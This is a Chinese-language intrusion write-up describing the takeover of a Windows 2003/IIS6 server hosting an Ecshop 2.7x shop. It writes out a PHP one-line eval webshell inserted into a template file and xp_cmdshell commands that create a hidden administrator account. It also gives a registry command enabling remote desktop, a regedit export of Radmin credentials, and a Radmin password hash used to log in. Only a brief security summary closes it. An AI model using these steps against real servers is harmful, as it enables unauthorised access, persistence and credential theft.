文章作者:过客

前言：记录一次检测网站拿下服务器的检测报告。写出此文仅供参考，以便更好的防范入侵。

 目标服务器：Windows2003+iis6+php+mysql+mssql+serv-u
目标网站：Ecshop2.7x

提权：
通常步骤
1、 上传asp webshell检测可用组件，端口，目录。
2、 上传aspx webhsell 测试执行命令，获取进程、服务、端口信息

 入手

Echop2.7x暴过几个注入，很容易取到后台登录密码。
这个利用方法百度都有，不在一一描述。
后台Getshell，也有很多方法。这里用到模块管理-库项目管理-选择myship.lbi里插入<?php eval($_POST['c'])?>
连接http://site/myship.php一句话

 信息收集

一、 检测权限

1. 先php shell检测服务器上的目录浏览权限，D:/wwwroot/xxx/wwwroot/可以看出是IDC管理网站的做法，独立用户单独权限处理当前用户无法跳转跨目录。
另外，C D E F盘都无浏览权限。因为PHP和ASP继承的是IIS用户的权限，所以都不能列出目录。

2. 列出程序目录，如图

360、Microsoft SQL Server先想到两种提权方法

 二、 检测目标服务

上传asp shell检测服务器组件
1. wscript.shell × 命令行执行组件 不支持

2. 常用端口
127.0.0.1:1433.........开放
127.0.0.1:3389.........关闭
127.0.0.1:43958.........开放

3. C:Documents and SettingsAll Users 无权限访问
C:Documents and SettingsAll Users「开始」菜单程序 无权限访问
C:Documents and SettingsAll UsersDocuments 可读取写入

4.查看系统服务-用户账号　　对象不支持此属性或方法（禁用了Workstation）

5. 查看管理员　　他奶奶的不行啊:Wscript.Network （禁用了Wscript.Network）

 

3. IIS SPY可列IIS用户、密码、域名以及本地路径。

4. Process列出进程，可利用如下
1 1176 hzclient 华众主机客户端
12 1588 r_server Radmin控制服务端
18 10660 shstat mcafee杀毒
55 3548 SERVUTRAY serv-u服务端
73 10892 mysqld mysql数据库

5. Services列出服务，可利用如下
29 1176 HZCLIENT D:hzhosthzclient.exe 
72 1588 r_server "C:WINDOWSsystem32r_server.exe" /service 
41 1312 McShield "C:Program FilesMcAfeeVirusScan EnterpriseMcshield.exe" 
50 10892 MySQL51 "E:Program FilesMySQLMySQL Server 5.1binmysqld" --defaults-file="E:Program FilesMySQLMySQL Server 5.1my.ini" MySQL51 
79 5708 Serv-U E:program filesServ-UServUDaemon.exe

三、 目标服务分析
提权思路：360本地提权、Serv-U本地提权、mysql root提权、mssql sa提权、华众主机注册表读取信息提权、Radmin注册表读取信息提权。
四、 提权进行时

1、 上传360提权exp,通过aspx调用C:Documents and SettingsAll UsersDocuments cmd.exe执行失败，这个360自动升级的成功的希望现在很小。

2、 Serv-U本地提权，利用aspx集成的Serv-U本地提权工具执行。失败，

如图：

需要密码验证。
读取Serv-U配置文件，无权限。

如图：

 

3、 mysql root提权，找到data/mysql/user.myd。
无权限，如图：

4、 华众主机注册表读取信息提权，HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettings。
如图：

 

根据以前漏洞所描述：可利用的有sa和root。

接下来使用工具sysstr破之。发现使用sa连接，提示错误。
无奈，使用hzhost用户登录下发现是public权限。基本上提权无望。
mssqlpss =2PDjjPpqVZqbrnGgy#492c7eea052b52解不出

 

再仔细看看发现了一个sysdbsa= 使用工具破之。ASPX数据库功能成功连接！

 

Sa用户，最高权限。
接下来就是添加用户，执行

 

xp_cmdshell "net user admin udb311 /add & net localgroup administrators admin /add"  
接着开启3389 

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  

以上代码保存为3389.bat
上传至可写目录，然后执行

xp_cmdshell “C:Documents and SettingsAll UsersDocuments3389.bat” 

成功。
仍然无法连接3389,接着看windows防火墙与ipsec都关闭了。仍然不能连接，郁闷至极了。
5、 进入Radmin注册表读取信息提权，aspx无法读取此项目。
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters
利用system权限导出
regedit /e d:wwwrootxxx radmin.reg HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters
以上代码保存为1.bat上传。
xp_cmdshell “C:Documents and SettingsAll UsersDocuments1.bat”
接下来使用webshell下载导出的radmin.reg。

使用HASH版本的Radmin客户端，输入32位的HASH值b5bbfc5093ba35b07da657f7d6f19aa0连接之。成功进入服务器，最好发现mcafee制定了端口保护策略，即使开了3389服务也不能连接之。Mcafee有密码保护，无法停止和结束服务。

安全性总结：通过以上的分析，得到几个重点。
1、 目录权限一定要设置合理，防止泄露信息。
2、 第三方软件最好少用，尽量控制好权限设置。

此服务器安全缺陷：
1、 php网站全面支持asp aspx。
2、 IIS SPY 与Servicesa功能没有禁止，导致ASPX木马可以得到服务器安装软件和网站的信息。
3、 华众虚拟主机注册表权限分配不当，导致信息泄露。
4、 SQL服务与mysql服务是以system 权限运行。